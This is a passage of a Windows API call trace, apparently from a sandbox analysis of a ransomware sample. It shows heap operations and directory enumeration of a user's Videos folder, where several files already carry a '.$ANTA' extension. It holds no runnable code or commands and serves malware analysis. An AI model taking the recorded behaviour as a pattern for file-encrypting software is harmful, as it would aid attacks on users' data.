Flags=0x0, Size=0x10) returned 0x43ca730 [0104.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0104.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0104.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0104.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0104.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0104.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0104.381] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\*", lpFindFileData=0x144e5a0 | out: lpFindFileData=0x144e5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5ba5f170, ftCreationTime.dwHighDateTime=0x1d5e1c0, ftLastAccessTime.dwLowDateTime=0xa51f365, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0xa51f365, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca700, cFileName=".", cAlternateFileName="")) returned 0x41ac500 [0104.381] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144e5a0 | out: lpFindFileData=0x144e5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5ba5f170, ftCreationTime.dwHighDateTime=0x1d5e1c0, ftLastAccessTime.dwLowDateTime=0xa51f365, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0xa51f365, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca700, cFileName="..", cAlternateFileName="")) returned 1 [0104.381] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144e5a0 | out: lpFindFileData=0x144e5a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9afa0f5, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x9afa0f5, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x9b466fc, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x5e0, dwReserved0=0x0, dwReserved1=0x43ca700, cFileName="333uErW2SJ.avi.$ANTA", cAlternateFileName="333UER~1.$AN")) returned 1 [0104.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0104.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0104.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0104.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0104.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f50 [0104.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0104.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0104.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0104.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0104.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0104.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0104.382] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0104.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0104.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9818 [0104.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0104.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9818 | out: hHeap=0x1780000) returned 1 [0104.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0104.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0104.382] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0104.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0104.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0104.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0104.382] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0104.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0104.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0104.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0104.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0104.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0104.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0104.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0104.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0104.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0104.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0104.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0104.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0104.383] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0104.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0104.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eada8 [0104.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0104.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eada8 | out: hHeap=0x1780000) returned 1 [0104.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0104.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0104.383] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0104.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0104.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0104.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0104.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0104.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea958 [0104.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0104.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea958 | out: hHeap=0x1780000) returned 1 [0104.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0104.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0104.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0104.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0104.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0104.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0104.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4d8 [0104.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca700 [0104.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0104.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0104.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0104.384] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0104.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0104.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0104.384] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0104.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0104.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0104.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0104.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0104.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0104.384] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144e588 | out: lpFindFileData=0x144e588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c9dbc4, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x9c9dbc4, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x9d36525, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0xbcc0, dwReserved0=0x144ea80, dwReserved1=0x8, cFileName="c1tN0jRrSKz9_ 3.mkv.$ANTA", cAlternateFileName="C1TN0J~1.$AN")) returned 1 [0104.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0104.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0104.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0104.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0104.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0104.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0104.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f50 | out: hHeap=0x1780000) returned 1 [0104.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0104.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0104.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0104.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0104.384] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0104.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0104.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e95f0 [0104.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0104.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e95f0 | out: hHeap=0x1780000) returned 1 [0104.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0104.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0104.385] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0104.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0104.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0104.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0104.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0104.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea958 [0104.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0104.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea958 | out: hHeap=0x1780000) returned 1 [0104.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0104.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0104.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0104.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0104.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0104.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0104.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca700 [0104.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca730 [0104.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0104.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0104.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0104.385] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0104.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0104.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0104.385] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0104.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0104.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0104.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0104.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0104.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0104.386] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144e588 | out: lpFindFileData=0x144e588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9f4c70a, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x9f4c70a, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0xa306057, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x18d00, dwReserved0=0x144ea80, dwReserved1=0x8, cFileName="WfuP9I.swf.$ANTA", cAlternateFileName="WFUP9I~1.$AN")) returned 1 [0104.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0104.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391cb0 [0104.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0104.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0104.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0104.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0104.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391cb0 | out: hHeap=0x1780000) returned 1 [0104.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0104.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0104.386] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0104.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0104.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea958 [0104.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0104.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea958 | out: hHeap=0x1780000) returned 1 [0104.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0104.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0104.386] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0104.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0104.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0104.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0104.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0104.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea730 [0104.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0104.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea730 | out: hHeap=0x1780000) returned 1 [0104.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0104.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0104.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0104.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0104.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0104.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0104.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca700 [0104.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca730 [0104.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0104.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0104.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0104.387] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0104.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0104.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0104.387] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0104.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0104.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0104.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0104.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0104.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0104.387] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144e588 | out: lpFindFileData=0x144e588*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x788f5c40, ftCreationTime.dwHighDateTime=0x1d5e206, ftLastAccessTime.dwLowDateTime=0x89ee8070, ftLastAccessTime.dwHighDateTime=0x1d5f0ba, ftLastWriteTime.dwLowDateTime=0x89ee8070, ftLastWriteTime.dwHighDateTime=0x1d5f0ba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x144ea80, dwReserved1=0x8, cFileName="yyOweBt9y9iUOOrJX", cAlternateFileName="YYOWEB~1")) returned 1 [0104.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0104.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0104.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0104.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0104.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0104.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0104.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0104.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0104.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0104.388] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0104.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0104.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea0b8 [0104.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0104.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0104.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0104.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0104.388] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0104.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0104.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0104.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e95f0 | out: hHeap=0x1780000) returned 1 [0104.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0104.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0104.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0104.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0104.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0104.388] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0104.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0104.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0104.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0104.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0104.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0104.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0104.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0104.389] HeapFree (in: hHeap=0x1780000, 